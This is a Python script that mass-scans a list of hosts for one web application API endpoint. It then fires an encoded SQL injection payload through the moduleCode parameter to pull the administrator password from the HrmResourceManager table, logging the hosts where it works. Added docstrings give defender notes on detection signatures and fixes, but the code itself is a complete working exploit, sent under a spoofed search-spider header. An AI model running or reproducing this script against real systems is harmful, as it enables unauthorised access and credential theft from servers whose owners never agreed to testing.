import requests
from time import sleep

# Request headers shared by both probe functions in this script.
#
# Detection note: the key is spelled "UserAgent", so `requests` sends it as an
# extra header with that literal name while still sending its own default
# `User-Agent` (python-requests/<version>). A request carrying a non-standard
# `UserAgent` header whose value claims to be a Baidu spider renderer is
# therefore a usable log/WAF signature for this tool.
headers = dict(
    UserAgent="Mozilla/5.0(compatible;Baiduspiderrender/2.0;+http://www.baidu.com/search/spider.html)",
)


def FingerPrint():
    """Probe every host listed in ``urls.txt`` for one API endpoint.

    For each line of ``urls.txt`` the function issues a plain-HTTP GET to
    ``/api/ec/dev/locale/getLabelByModule`` and appends the full URL to
    ``probable.txt`` when the response status is 200. Nothing is returned;
    the only outputs are the appended file and console messages.

    Defender notes:
      * A status of 200 is the only criterion, so this is a coarse
        reachability check, not proof that a host is affected.
      * In access logs this stage appears as an unauthenticated GET to the
        path above with no query string, from a client sending the
        ``UserAgent`` header defined at module level.
      * Exposure is reduced by not publishing this API path to untrusted
        networks and by keeping the application on a vendor-fixed release.
    """
    # Input list: one host (no scheme) per line. The handle is never closed
    # explicitly.
    urls = open('urls.txt', 'r', encoding="utf-8")
    for url_list in urls:
        try:
            # Endpoint used as the fingerprint.
            pay = "/api/ec/dev/locale/getLabelByModule"
            # Only the trailing newline is stripped; the scheme is always http://.
            url = "http://" + url_list.replace("\n", "") + pay
            response = requests.get(url, headers=headers, timeout=20)
            if response.status_code == 200:
                # Re-opened in append mode for every hit and not closed explicitly.
                f = open("probable.txt", "a", encoding="utf-8")
                urlf = url + "\n"
                f.write(urlf)
                # Message: "written successfully".
                print(url, "写入成功!\n")
            else:
                # Message: "not a version in which the vulnerability exists".
                print(url, "不属于存在漏洞的版本\n")
        except BaseException:
            # Every failure (connection error, timeout, and also
            # KeyboardInterrupt/SystemExit) is reduced to one generic message:
            # "check that the input text file is correct".
            print("请检查您调用文本是否正确,报错函数:FingerPrint()")


def SQL_injection():
    """Test each URL in ``probable.txt`` for SQL injection in ``moduleCode``.

    Each line of ``probable.txt`` (written by ``FingerPrint``) gets a fixed,
    fully percent-encoded ``moduleCode`` query value appended. The response is
    parsed as JSON, and when its ``datas`` field equals ``"111"`` the request
    URL is appended to ``IsSqlI.txt``. Nothing is returned.

    Defender notes:
      * The root cause being tested is a ``moduleCode`` parameter that reaches
        a SQL statement without parameter binding. The fix is a bound or
        parameterised query on the server side, together with the vendor's
        patch for this endpoint.
      * The encoded value closes the original string and parenthesis, then
        adds a ``UNION ALL SELECT`` that reads the ``password`` column of
        ``HrmResourceManager`` for ``id=1``. A successful test therefore
        implies that credential material could be exposed, and the affected
        account should be treated as compromised.
      * Every character of the value is percent-encoded, including plain
        letters. Detection rules should URL-decode the query string before
        matching on SQL keywords or on the table name. An unusually high
        ratio of ``%xx`` escapes in ``moduleCode`` is itself a signal.
    """
    # Candidate URLs produced by the previous stage; handle is never closed
    # explicitly.
    urls = open('probable.txt', 'r', encoding='utf-8')
    for url_list in urls:
        try:
            # Fixed injection string for the moduleCode parameter (see docstring).
            payload = "?moduleCode=%61%61%61%27%29%20%75%6e%69%6f%6e%20%61%6c%6c%20%73%65%6c%65%63%74%20%27%31%31%31%2c%27%2b%20%28%73%65%6c%65%63%74%20%70%61%73%73%77%6f%72%64%20%66%72%6f%6d%20%48%72%6d%52%65%73%6f%75%72%63%65%4d%61%6e%61%67%65%72%20%77%68%65%72%65%20%69%64%3d%31%29%20%2d%2d"
            url = url_list.replace("\n", "") + payload
            # .json() raises when the body is not JSON; that is caught below.
            response = requests.get(url, headers=headers, timeout=20).json()
            # "111" is the marker literal the injected query places in the result.
            if response['datas'] == "111":
                # Re-opened in append mode for every hit and not closed explicitly.
                f = open("IsSqlI.txt", "a", encoding="utf-8")
                urlf = url + "\n"
                f.write(urlf)
                # Message: "written successfully".
                print(url_list.replace("\n",""), "写入成功!\n")
            else:
                # Message: "no SQL injection vulnerability present".
                print(url_list.replace("\n",""), "不存在SQL注入漏洞!\n")
        except BaseException:
            # Any failure (network error, non-JSON body, missing 'datas' key,
            # and also KeyboardInterrupt/SystemExit) prints one message:
            # "the site may not be injectable and returned unexpected data;
            # the error can be ignored".
            print("可能站点不存在SQL注入返回数据有误导致报错!报错函数:SQL_injection(),报错可忽略")


if __name__ == "__main__":
    # Stage 1: read urls.txt and record every host answering 200 on the probed
    # endpoint in probable.txt.
    FingerPrint()
    # Fixed one-second pause between the two stages.
    sleep(1)
    # Stage 2: read probable.txt (stage 1 output) and record hosts whose
    # response matches the injection marker in IsSqlI.txt.
    SQL_injection()